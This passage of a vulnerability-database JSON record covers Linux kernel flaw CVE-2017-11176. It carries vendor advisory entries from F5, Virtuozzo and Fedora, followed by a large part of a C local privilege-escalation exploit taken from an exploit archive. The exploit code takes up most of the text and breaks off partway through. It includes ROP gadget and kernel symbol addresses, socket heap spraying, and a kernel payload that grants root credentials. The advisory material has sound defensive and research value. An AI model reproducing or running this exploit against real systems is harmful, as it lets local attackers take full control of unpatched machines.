hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable2 | None | None \nBIG-IP AAM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 | Not vulnerable2 | None | None \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 | Not vulnerable2 | None | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable2 | None | None \nBIG-IP APM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable2 | None | None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 \n | Not vulnerable2 | None | None \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.2 | Not vulnerable2 | None | None \nBIG-IP Edge Gateway | None | 11.2.1 | Not vulnerable2 | None | None \nBIG-IP GTM | None | 11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable2 | None | None \nBIG-IP Link Controller | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable2 | None | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 | Not vulnerable2 | None | None \nBIG-IP WebAccelerator | None | 11.2.1 | Not vulnerable2 | None | None \nF5 WebSafe | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.2 | Not vulnerable2 | None | None \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None | None \nEnterprise Manager | None | 3.1.1 | Not vulnerable2 | None | None \nBIG-IQ Cloud | None | 4.4.0 - 4.5.0 | Not vulnerable2 | None | None \nBIG-IQ Device | None | 4.4.0 - 4.5.0 | Not vulnerable2 | None | None \nBIG-IQ Security | None | 4.4.0 - 4.5.0 | Not vulnerable2 | None | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable2 | None | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.3.0 \n4.6.0 | Not vulnerable2 | None | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable2 | None | None \nF5 iWorkflow | None | 2.0.0 - 2.3.0 | Not vulnerable2 | None | None \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None | None \nTraffix SDC | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 \n | None | High | [7.8](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H>) | Linux kernel \n \n1The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\n2The specified products contain the affected code. However, F5 identifies the vulnerability status as Not vulnerable because the attacker cannot exploit the code in default, standard, or recommended configurations.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2017-11-15T03:26:00", "published": "2017-11-15T03:26:00", "id": "F5:K56450659", "href": "https://support.f5.com/csp/article/K56450659", "title": "Linux kernel vulnerability CVE-2017-11176", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "virtuozzo": [{"lastseen": "2019-11-05T11:28:18", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security and stability fixes. The patch applies to Virtuozzo kernels 3.10.0-327.18.2.vz7.15.2 (Virtuozzo 7.0.0), 3.10.0-327.36.1.vz7.18.7 (Virtuozzo 7.0.1), 3.10.0-327.36.1.vz7.20.18 (Virtuozzo 7.0.3), 3.10.0-514.16.1.vz7.30.10 (Virtuozzo 7.0.4), and 3.10.0-514.16.1.vz7.30.15 (Virtuozzo 7.0.4 HF3).\n**Vulnerability id:** CVE-2017-11176\nThe mq_notify function in the Linux kernel through 4.11.9 does not set the sock pointer to NULL upon entry into the retry logic. During a user-space close of a Netlink socket, it allows attackers to cause a denial of service (use-after-free) or possibly have unspecified other impact.\n\n**Vulnerability id:** PSBM-64050\nIf the sctp module was loaded on the host, a privileged user inside a container could make sctp listen on a socket in an inappropriate state, causing a kernel crash (use-after-free in sctp_wait_for_sndbuf()).\n\n", "edition": 1, "modified": "2017-07-19T00:00:00", "published": "2017-07-19T00:00:00", "id": "VZA-2017-065", "href": "https://help.virtuozzo.com/customer/portal/articles/2843880", "title": "Kernel security update: CVE-2017-11176 and other; Virtuozzo ReadyKernel patch 26.1 for Virtuozzo 7.0.x", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176"], "description": "The kernel meta package ", "modified": "2017-07-23T04:01:51", "published": "2017-07-23T04:01:51", "id": "FEDORA:B60446046988", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: kernel-4.11.11-300.fc26", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176"], "description": "The kernel meta package ", "modified": "2017-07-23T22:57:11", "published": "2017-07-23T22:57:11", "id": "FEDORA:274BB60875C4", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: kernel-4.11.11-200.fc25", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176", "CVE-2017-11473", "CVE-2017-7541", "CVE-2017-7542"], "description": "The kernel meta package ", "modified": "2017-07-26T21:20:27", "published": "2017-07-26T21:20:27", "id": "FEDORA:83CF561C31BC", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: kernel-4.11.12-100.fc24", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-10-09T02:49:44", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2018-10-09T00:00:00", "title": "Linux Kernel < 4.11.8 - mq_notify: double sock_put() Local Privilege Escalation Exp", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11176"], "modified": "2018-10-09T00:00:00", "id": "1337DAY-ID-31273", "href": "https://0day.today/exploit/description/31273", "sourceData": "/*\r\n * CVE-2017-11176: \"mq_notify: double sock_put()\" by LEXFO (2018).\r\n *\r\n * DISCLAIMER: The following code is for EDUCATIONAL purpose only. Do not\r\n * use it on a system without authorizations.\r\n *\r\n * WARNING: The exploit WILL NOT work on your target, it requires modifications!\r\n *\r\n * Compile with:\r\n *\r\n * gcc -fpic -O0 -std=c99 -Wall -pthread cve-2017-11176.c -o exploit\r\n *\r\n * For a complete explanation / analysis, please read the following series:\r\n *\r\n * - https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part1.html\r\n * - https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part2.html\r\n * - https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part3.html\r\n * - https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part4.html\r\n */\r\n \r\n#define _GNU_SOURCE\r\n#include <asm/types.h>\r\n#include <mqueue.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <sys/syscall.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/un.h>\r\n#include <linux/netlink.h>\r\n#include <pthread.h>\r\n#include <errno.h>\r\n#include <stdbool.h>\r\n#include <sched.h>\r\n#include <stddef.h>\r\n#include <sys/mman.h>\r\n#include <stdint.h>\r\n \r\n// ============================================================================\r\n// ----------------------------------------------------------------------------\r\n// ============================================================================\r\n \r\n#define NOTIFY_COOKIE_LEN (32)\r\n#define SOL_NETLINK (270) // from [include/linux/socket.h]\r\n \r\n#define NB_REALLOC_THREADS 200\r\n#define KMALLOC_TARGET 1024\r\n \r\n#define MAX_SOCK_PID_SPRAY 300\r\n \r\n#define MAGIC_NL_PID 0x11a5dcee\r\n#define MAGIC_NL_GROUPS 0x0\r\n \r\n// ----------------------------------------------------------------------------\r\n \r\n// avoid library wrappers\r\n#define _mq_notify(mqdes, sevp) syscall(__NR_mq_notify, mqdes, sevp)\r\n#define _mmap(addr, length, prot, flags, fd, offset) syscall(__NR_mmap, addr, length, prot, flags, fd, offset)\r\n#define _munmap(addr, length) syscall(_NR_munmap, addr, length)\r\n#define _socket(domain, type, protocol) syscall(__NR_socket, domain, type, protocol)\r\n#define _setsockopt(sockfd, level, optname, optval, optlen) \\\r\n syscall(__NR_setsockopt, sockfd, level, optname, optval, optlen)\r\n#define _getsockopt(sockfd, level, optname, optval, optlen) \\\r\n syscall(__NR_getsockopt, sockfd, level, optname, optval, optlen)\r\n#define _dup(oldfd) syscall(__NR_dup, oldfd)\r\n#define _close(fd) syscall(__NR_close, fd)\r\n#define _sendmsg(sockfd, msg, flags) syscall(__NR_sendmsg, sockfd, msg, flags)\r\n#define _bind(sockfd, addr, addrlen) syscall(__NR_bind, sockfd, addr, addrlen)\r\n#define _getpid() syscall(__NR_getpid)\r\n#define _gettid() syscall(__NR_gettid)\r\n#define _sched_setaffinity(pid, cpusetsize, mask) \\\r\n syscall(__NR_sched_setaffinity, pid, cpusetsize, mask)\r\n#define _open(pathname, flags) syscall(__NR_open, pathname, flags)\r\n#define _read(fd, buf, count) syscall(__NR_read, fd, buf, count)\r\n#define _getsockname(sockfd, addr, addrlen) syscall(__NR_getsockname, sockfd, addr, addrlen)\r\n#define _connect(sockfd, addr, addrlen) syscall(__NR_connect, sockfd, addr, addrlen)\r\n#define _sched_yield() syscall(__NR_sched_yield)\r\n#define _lseek(fd, offset, whence) syscall(__NR_lseek, fd, offset, whence)\r\n \r\n// ----------------------------------------------------------------------------\r\n \r\n#define PRESS_KEY() \\\r\n do { printf(\"[ ] press key to continue...\\n\"); getchar(); } while(0)\r\n \r\n#define BUILD_BUG_ON(cond) ((void)sizeof(char[1 - 2 * !!(cond)]))\r\n \r\n// ----------------------------------------------------------------------------\r\n \r\n// target specific offset\r\n#define NLK_PID_OFFSET 0x288\r\n#define NLK_GROUPS_OFFSET 0x2a0\r\n#define NLK_WAIT_OFFSET 0x2b0\r\n#define WQ_HEAD_TASK_LIST_OFFSET 0x8\r\n#define WQ_ELMT_FUNC_OFFSET 0x10\r\n#define WQ_ELMT_TASK_LIST_OFFSET 0x18\r\n#define TASK_STRUCT_FILES_OFFSET 0x770\r\n#define FILES_STRUCT_FDT_OFFSET 0x8\r\n#define FDT_FD_OFFSET 0x8\r\n#define FILE_STRUCT_PRIVATE_DATA_OFFSET 0xa8\r\n#define SOCKET_SK_OFFSET 0x38\r\n \r\n// kernel function symbols\r\n#define NL_PID_HASHFN ((void*) 0xffffffff814b6da0)\r\n#define NETLINK_TABLE_GRAB ((void*) 0xffffffff814b7ea0)\r\n#define NETLINK_TABLE_UNGRAB ((void*) 0xffffffff814b73e0)\r\n#define COMMIT_CREDS ((void*) 0xffffffff810b8ee0)\r\n#define PREPARE_KERNEL_CRED ((void*) 0xffffffff810b90c0)\r\n#define NL_TABLE_ADDR ((void*) 0xffffffff824528c0)\r\n \r\n// gadgets in [_text; _etext]\r\n#define XCHG_EAX_ESP_ADDR ((uint64_t) 0xffffffff8107b6b8)\r\n#define MOV_PTR_RDI_MIN4_EAX_ADDR ((uint64_t) 0xffffffff811513b3)\r\n#define POP_RDI_ADDR ((uint64_t) 0xffffffff8103b81d)\r\n#define MOV_RAX_RBP_ADDR ((uint64_t) 0xffffffff813606d4)\r\n#define SHR_RAX_16_ADDR ((uint64_t) 0xffffffff810621ff)\r\n#define POP_RBP_ADDR ((uint64_t) 0xffffffff811b97bf)\r\n#define MOV_RAX_CR4_LEAVE_ADDR ((uint64_t) 0xffffffff81003009)\r\n#define MOV_CR4_RDI_LEAVE_ADDR ((uint64_t) 0xffffffff8100328d)\r\n#define AND_RAX_RDX_ADDR ((uint64_t) 0xffffffff8130c249)\r\n#define MOV_EDI_EAX_ADDR ((uint64_t) 0xffffffff814f118b)\r\n#define MOV_EDX_EDI_ADDR ((uint64_t) 0xffffffff8139ca54)\r\n#define POP_RCX_ADDR ((uint64_t) 0xffffffff81004abc)\r\n#define JMP_RCX_ADDR ((uint64_t) 0xffffffff8103357c)\r\n \r\n#define THREAD_SIZE (4096 << 2)\r\n \r\n// ----------------------------------------------------------------------------\r\n \r\nstruct realloc_thread_arg\r\n{\r\n pthread_t tid;\r\n int recv_fd;\r\n int send_fd;\r\n struct sockaddr_un addr;\r\n};\r\n \r\nstruct unblock_thread_arg\r\n{\r\n int sock_fd;\r\n int unblock_fd;\r\n bool is_ready; // we can use pthread barrier instead\r\n};\r\n \r\nstruct sock_pid\r\n{\r\n int sock_fd;\r\n uint32_t pid;\r\n};\r\n \r\n// ----------------------------------------------------------------------------\r\n \r\nstruct hlist_node {\r\n struct hlist_node *next, **pprev;\r\n};\r\n \r\nstruct hlist_head {\r\n struct hlist_node *first;\r\n};\r\n \r\nstruct nl_pid_hash {\r\n struct hlist_head* table;\r\n uint64_t rehash_time;\r\n uint32_t mask;\r\n uint32_t shift;\r\n uint32_t entries;\r\n uint32_t max_shift;\r\n uint32_t rnd;\r\n};\r\n \r\nstruct netlink_table {\r\n struct nl_pid_hash hash;\r\n void* mc_list;\r\n void* listeners;\r\n uint32_t nl_nonroot;\r\n uint32_t groups;\r\n void* cb_mutex;\r\n void* module;\r\n uint32_t registered;\r\n};\r\n \r\nstruct list_head\r\n{\r\n struct list_head *next, *prev;\r\n};\r\n \r\nstruct wait_queue_head\r\n{\r\n int slock;\r\n struct list_head task_list;\r\n};\r\n \r\ntypedef int (*wait_queue_func_t)(void *wait, unsigned mode, int flags, void *key);\r\n \r\nstruct wait_queue\r\n{\r\n unsigned int flags;\r\n#define WQ_FLAG_EXCLUSIVE 0x01\r\n void *private;\r\n wait_queue_func_t func;\r\n struct list_head task_list;\r\n};\r\n \r\nstruct socket {\r\n char pad[SOCKET_SK_OFFSET];\r\n void *sk;\r\n};\r\n \r\nstruct file {\r\n char pad[FILE_STRUCT_PRIVATE_DATA_OFFSET];\r\n void *private_data;\r\n};\r\n \r\nstruct fdtable {\r\n char pad[FDT_FD_OFFSET];\r\n struct file **fd;\r\n};\r\n \r\nstruct files_struct {\r\n char pad[FILES_STRUCT_FDT_OFFSET];\r\n struct fdtable *fdt;\r\n};\r\n \r\nstruct task_struct {\r\n char pad[TASK_STRUCT_FILES_OFFSET];\r\n struct files_struct *files;\r\n};\r\n \r\nstruct thread_info {\r\n struct task_struct *task;\r\n char pad[0];\r\n};\r\n \r\n// ----------------------------------------------------------------------------\r\n \r\ntypedef void (*netlink_table_grab_func)(void);\r\ntypedef void (*netlink_table_ungrab_func)(void);\r\ntypedef struct hlist_head* (*nl_pid_hashfn_func)(struct nl_pid_hash *hash, uint32_t pid);\r\ntypedef int (*commit_creds_func)(void *new);\r\ntypedef void* (*prepare_kernel_cred_func)(void *daemon);\r\n \r\n#define netlink_table_grab() \\\r\n (((netlink_table_grab_func)(NETLINK_TABLE_GRAB))())\r\n#define netlink_table_ungrab() \\\r\n (((netlink_table_ungrab_func)(NETLINK_TABLE_UNGRAB))())\r\n#define nl_pid_hashfn(hash, pid) \\\r\n (((nl_pid_hashfn_func)(NL_PID_HASHFN))(hash, pid))\r\n#define commit_creds(cred) \\\r\n (((commit_creds_func)(COMMIT_CREDS))(cred))\r\n#define prepare_kernel_cred(daemon) \\\r\n (((prepare_kernel_cred_func)(PREPARE_KERNEL_CRED))(daemon))\r\n \r\n// ----------------------------------------------------------------------------\r\n \r\nstatic volatile size_t g_nb_realloc_thread_ready = 0;\r\nstatic volatile size_t g_realloc_now = 0;\r\nstatic volatile char g_realloc_data[KMALLOC_TARGET];\r\n \r\nstatic volatile struct list_head g_fake_next_elt;\r\nstatic volatile struct wait_queue *g_uland_wq_elt;\r\nstatic volatile char *g_fake_stack;\r\n \r\nstatic volatile uint64_t saved_esp;\r\nstatic volatile uint64_t saved_rbp_lo;\r\nstatic volatile uint64_t saved_rbp_hi;\r\nstatic volatile uint64_t restored_rbp;\r\nstatic volatile uint64_t restored_rsp;\r\n \r\nstatic struct sock_pid g_target;\r\nstatic struct sock_pid g_guard;\r\nstatic int unblock_fd = 1;\r\n \r\n// ============================================================================\r\n// ----------------------------------------------------------------------------\r\n// ============================================================================\r\n \r\n#define get_thread_info(thread_stack_ptr) \\\r\n ((struct thread_info*) (thread_stack_ptr & ~(THREAD_SIZE - 1)))\r\n \r\n#define get_current(thread_stack_ptr) \\\r\n ((struct task_struct*) (get_thread_info(thread_stack_ptr)->task))\r\n \r\nstatic void payload(void)\r\n{\r\n struct task_struct *current = get_current(restored_rsp);\r\n struct socket *sock = current->files->fdt->fd[unblock_fd]->private_data;\r\n void *sk;\r\n \r\n sk = sock->sk; // keep it for list walking\r\n sock->sk = NULL; // fix the 'sk' dangling pointer\r\n \r\n // lock all hash tables\r\n netlink_table_grab();\r\n \r\n // retrieve NETLINK_USERSOCK's hash table\r\n struct netlink_table *nl_table = * (struct netlink_table**)NL_TABLE_ADDR; // deref it!\r\n struct nl_pid_hash *hash = &(nl_table[NETLINK_USERSOCK].hash);\r\n \r\n // retrieve the bucket list\r\n struct hlist_head *bucket = nl_pid_hashfn(hash, g_target.pid);\r\n \r\n // walk the bucket list\r\n struct hlist_node *cur;\r\n struct hlist_node **pprev = &bucket->first;\r\n for (cur = bucket->first; cur; pprev = &cur->next, cur = cur->next)\r\n {\r\n // is this our target ?\r\n if (cur == (struct hlist_node*)sk)\r\n {\r\n // fix the 'next' and 'pprev' field\r\n if (cur->next == (struct hlist_node*)KMALLOC_TARGET) // 'cmsg_len' value (reallocation)\r\n cur->next = NULL; // first scenario: was the last element in the list\r\n cur->pprev = pprev;\r\n \r\n // __hlist_del() operation (dangling pointers fix up)\r\n *(cur->pprev) = cur->next;\r\n if (cur->next)\r\n cur->next->pprev = pprev;\r\n \r\n hash->entries--; // make it clean\r\n \r\n // stop walking\r\n break;\r\n }\r\n }\r\n \r\n // release the lock\r\n netlink_table_ungrab();\r\n \r\n // privilege (de-)escalation\r\n commit_creds(prepare_kernel_cred(NULL));\r\n}\r\n \r\n// ============================================================================\r\n// ----------------------------------------------------------------------------\r\n// ============================================================================\r\n \r\n/*\r\n * Migrates the current thread to CPU#0.\r\n *\r\n * Returns 0 on success, -1 on error.\r\n */\r\n \r\nstatic int migrate_to_cpu0(void)\r\n{\r\n cpu_set_t set;\r\n \r\n CPU_ZERO(&set);\r\n CPU_SET(0, &set);\r\n \r\n if (_sched_setaffinity(_getpid(), sizeof(set), &set) == -1)\r\n {\r\n perror(\"[-] sched_setaffinity\");\r\n return -1;\r\n }\r\n \r\n return 0;\r\n}\r\n \r\n// ============================================================================\r\n// ----------------------------------------------------------------------------\r\n// ============================================================================\r\n \r\n/*\r\n * Creates a NETLINK_USERSOCK netlink socket, binds it and retrieves its pid.\r\n * Argument @sp must not be NULL.\r\n *\r\n * Returns 0 on success, -1 on error.\r\n */\r\n \r\nstatic int create_netlink_candidate(struct sock_pid *sp)\r\n{\r\n struct sockaddr_nl addr = {\r\n .nl_family = AF_NETLINK,\r\n .nl_pad = 0,\r\n .nl_pid = 0, // zero to use netlink_autobind()\r\n .nl_groups = 0 // no groups\r\n \r\n };\r\n size_t addr_len = sizeof(addr);\r\n \r\n if ((sp->sock_fd = _socket(AF_NETLINK, SOCK_DGRAM, NETLINK_USERSOCK)) == -1)\r\n {\r\n perror(\"[-] socket\");\r\n goto fail;\r\n }\r\n \r\n if (_bind(sp->sock_fd, (struct sockaddr*)&addr, sizeof(addr)) == -1)\r\n {\r\n perror(\"[-] bind\");\r\n goto fail_close;\r\n }\r\n \r\n if (_getsockname(sp->sock_fd, &addr, &addr_len))\r\n {\r\n perror(\"[-] getsockname\");\r\n goto fail_close;\r\n }\r\n \r\n sp->pid = addr.nl_pid;\r\n \r\n return 0;\r\n \r\nfail_close:\r\n close(sp->sock_fd);\r\nfail:\r\n sp->sock_fd = -1;\r\n sp->pid = -1;\r\n return -1;\r\n}\r\n \r\n// ----------------------------------------------------------------------------\r\n \r\n/*\r\n * Parses @proto hash table from '/proc/net/netlink' and allocates/fills the\r\n * @pids array. The total numbers of pids matched is stored in @nb_pids.\r\n *\r\n * A typical output looks like:\r\n *\r\n * $ cat /proc/net/netlink\r\n * sk Eth Pid Groups Rmem Wmem Dump Locks Drops\r\n * ffff88001eb47800 0 0 00000000 0 0 (null) 2 0 \r\n * ffff88001fa65800 6 0 00000000 0 0 (null) 2 0 \r\n *\r\n * Every line is printed from netlink_seq_show():\r\n *\r\n * seq_printf(seq, \"%p %-3d %-6d %08x %-8d %-8d %p %-8d %-8d\\n\"\r\n *\r\n * Returns 0 on success, -1 on error.\r\n */\r\n \r\nstatic int parse_proc_net_netlink(int **pids, size_t *nb_pids, uint32_t proto)\r\n{\r\n int proc_fd;\r\n char buf[4096];\r\n int ret;\r\n char *ptr;\r\n char *eol_token;\r\n size_t nb_bytes_read = 0;\r\n size_t tot_pids = 1024;\r\n \r\n *pids = NULL;\r\n *nb_pids = 0;\r\n \r\n if ((*pids = calloc(tot_pids, sizeof(**pids))) == NULL)\r\n {\r\n perror(\"[-] not enough memory\");\r\n goto fail;\r\n }\r\n \r\n memset(buf, 0, sizeof(buf));\r\n if ((proc_fd = _open(\"/proc/net/netlink\", O_RDONLY)) < 0)\r\n {\r\n perror(\"[-] open\");\r\n goto fail;\r\n }\r\n \r\nread_next_block:\r\n if ((ret = _read(proc_fd, buf, sizeof(buf))) < 0)\r\n {\r\n perror(\"[-] read\");\r\n goto fail_close;\r\n }\r\n else if (ret == 0) // no more line to read\r\n {\r\n goto parsing_complete;\r\n }\r\n \r\n ptr = buf;\r\n \r\n if (strstr(ptr, \"sk\") != NULL) // this is the first line\r\n { \r\n if ((eol_token = strstr(ptr, \"\\n\")) == NULL)\r\n {\r\n // XXX: we don't handle this case, we can't even read one line...\r\n printf(\"[-] can't find end of first line\\n\");\r\n goto fail_close;\r\n }\r\n nb_bytes_read += eol_token - ptr + 1;\r\n ptr = eol_token + 1; // skip the first line\r\n }\r\n \r\nparse_next_line:\r\n // this is a \"normal\" line\r\n if ((eol_token = strstr(ptr, \"\\n\")) == NULL) // current line is incomplete\r\n {\r\n if (_lseek(proc_fd, nb_bytes_read, SEEK_SET) == -1)\r\n {\r\n perror(\"[-] lseek\");\r\n goto fail_close;\r\n }\r\n goto read_next_block;\r\n }\r\n else\r\n {\r\n void *cur_addr;\r\n int cur_proto;\r\n int cur_pid;\r\n \r\n sscanf(ptr, \"%p %d %d\", &cur_addr, &cur_proto, &cur_pid);\r\n \r\n if (cur_proto == proto)\r\n {\r\n if (*nb_pids >= tot_pids) // current array is not big enough, make it grow\r\n {\r\n tot_pids *= 2;\r\n if ((*pids = realloc(*pids, tot_pids * sizeof(int))) == NULL)\r\n {\r\n printf(\"[-] not enough memory\\n\");\r\n goto fail_close;\r\n }\r\n }\r\n \r\n *(*pids + *nb_pids) = cur_pid;\r\n *nb_pids = *nb_pids + 1;\r\n }\r\n \r\n nb_bytes_read += eol_token - ptr + 1;\r\n ptr = eol_token + 1;\r\n goto parse_next_line;\r\n }\r\n \r\nparsing_complete:\r\n close(proc_fd);\r\n return 0;\r\n \r\nfail_close:\r\n close(proc_fd);\r\nfail:\r\n if (*pids != NULL)\r\n free(*pids);\r\n *nb_pids = 0;\r\n return -1;\r\n}\r\n \r\n// ----------------------------------------------------------------------------\r\n \r\n/*\r\n * Prepare multiple netlink sockets and search \"adjacent\" ones. Arguments\r\n * @target and @guard must not be NULL.\r\n *\r\n * Returns 0 on success, -1 on error.\r\n */\r\n \r\nstatic int find_netlink_candidates(struct sock_pid *target, struct sock_pid *guard)\r\n{\r\n struct sock_pid candidates[MAX_SOCK_PID_SPRAY];\r\n int *pids = NULL;\r\n size_t nb_pids;\r\n int i, j;\r\n int nb_owned;\r\n int ret = -1;\r\n \r\n target->sock_fd = -1;\r\n guard->sock_fd = -1;\r\n \r\n // allocate a bunch of netlink sockets\r\n for (i = 0; i < MAX_SOCK_PID_SPRAY; ++i)\r\n {\r\n if (create_netlink_candidate(&candidates[i]))\r\n { \r\n printf(\"[-] failed to create a new candidate\\n\");\r\n goto release_candidates;\r\n }\r\n }\r\n printf(\"[+] %d candidates created\\n\", MAX_SOCK_PID_SPRAY);\r\n \r\n if (parse_proc_net_netlink(&pids, &nb_pids, NETLINK_USERSOCK))\r\n {\r\n printf(\"[-] failed to parse '/proc/net/netlink'\\n\");\r\n goto release_pids;\r\n }\r\n printf(\"[+] parsing '/proc/net/netlink' complete\\n\");\r\n \r\n // find two consecutives pid that we own (slow algorithm O(N*M))\r\n i = nb_pids;\r\n while (--i > 0)\r\n {\r\n guard->pid = pids[i];\r\n target->pid = pids[i - 1];\r\n nb_owned = 0;\r\n \r\n // the list is not ordered by pid, so we do a full walking\r\n for (j = 0; j < MAX_SOCK_PID_SPRAY; ++j) \r\n {\r\n if (candidates[j].pid == guard->pid)\r\n {\r\n guard->sock_fd = candidates[j].sock_fd;\r\n nb_owned++;\r\n }\r\n else if (candidates[j].pid == target->pid)\r\n {\r\n target->sock_fd = candidates[j].sock_fd;\r\n nb_owned++;\r\n }\r\n \r\n if (nb_owned == 2)\r\n goto found;\r\n }\r\n \r\n // reset sock_fd to release them\r\n guard->sock_fd = -1;\r\n target->sock_fd = -1;\r\n }\r\n \r\n // we didn't found any valid candidates, release and quit\r\n goto release_pids;\r\n \r\nfound:\r\n printf(\"[+] adjacent candidates found!\\n\");\r\n ret = 0; // we succeed\r\n \r\nrelease_pids:\r\n i = MAX_SOCK_PID_SPRAY; // reset the candidate counter for release\r\n if (pids != NULL)\r\n free(pids);\r\n \r\nrelease_candidates:\r\n while (--i >= 0)\r\n {\r\n // do not release the target/guard sockets\r\n if ((candidates[i].sock_fd != target->sock_fd) &&\r\n (candidates[i].sock_fd != guard->sock_fd))\r\n {\r\n close(candidates[i].sock_fd);\r\n }\r\n }\r\n \r\n return ret;\r\n} \r\n \r\n// ============================================================================\r\n// ----------------------------------------------------------------------------\r\n// ============================================================================\r\n \r\nstatic void* unblock_thread(void *arg)\r\n{\r\n struct unblock_thread_arg *uta = (struct unblock_thread_arg*) arg;\r\n int val = 3535; // need to be different than zero\r\n \r\n // notify the main thread that the unblock thread has been created. It *must*\r\n // directly call mq_notify().\r\n uta->is_ready = true; \r\n \r\n sleep(5); // gives some time for the main thread to block\r\n \r\n printf(\"[ ][unblock] closing %d fd\\n\", uta->sock_fd);\r\n _close(uta->sock_fd);\r\n \r\n printf(\"[ ][unblock] unblocking now\\n\");\r\n if (_setsockopt(uta->unblock_fd, SOL_NETLINK, NETLINK_NO_ENOBUFS, &val, sizeof(val)))\r\n perror(\"[+] setsockopt\");\r\n return NULL;\r\n}\r\n \r\n// ----------------------------------------------------------------------------\r\n \r\nstatic int decrease_sock_refcounter(int sock_fd, int unblock_fd)\r\n{\r\n pthread_t tid;\r\n struct sigevent sigev;\r\n struct unblock_thread_arg uta;\r\n char sival_buffer[NOTIFY_COOKIE_LEN];\r\n \r\n // initialize the unblock thread arguments\r\n uta.sock_fd = sock_fd;\r\n uta.unblock_fd = unblock_fd;\r\n uta.is_ready = false;\r\n \r\n // initialize the sigevent structure\r\n memset(&sigev, 0, sizeof(sigev));\r\n sigev.sigev_notify = SIGEV_THREAD;\r\n sigev.sigev_value.sival_ptr = sival_buffer;\r\n sigev.sigev_signo = uta.sock_fd;\r\n \r\n printf(\"[ ] creating unblock thread...\\n\");\r\n if ((errno = pthread_create(&tid, NULL, unblock_thread, &uta)) != 0)\r\n {\r\n perror(\"[-] pthread_create\");\r\n goto fail;\r\n }\r\n while (uta.is_ready == false) // spinlock until thread is created\r\n ;\r\n printf(\"[+] unblocking thread has been created!\\n\");\r\n \r\n printf(\"[ ] get ready to block\\n\");\r\n if ((_mq_notify((mqd_t)-1, &sigev) != -1) || (errno != EBADF))\r\n {\r\n perror(\"[-] mq_notify\");\r\n goto fail;\r\n }\r\n printf(\"[+] mq_notify succeed\\n\");\r\n \r\n return 0;\r\n \r\nfail:\r\n return -1;\r\n}\r\n \r\n// ----------------------------------------------------------------------------\r\n \r\nstatic int fill_receive_buffer(struct sock_pid *target, struct sock_pid *guard)\r\n{\r\n char buf[1024*10];\r\n int new_size = 0; // this will be reset to SOCK_MIN_RCVBUF\r\n \r\n struct sockaddr_nl addr = {\r\n .nl_family = AF_NETLINK,\r\n .nl_pad = 0,\r\n .nl_pid = target->pid, // use the target's pid\r\n .nl_groups = 0 // no groups\r\n };\r\n \r\n struct 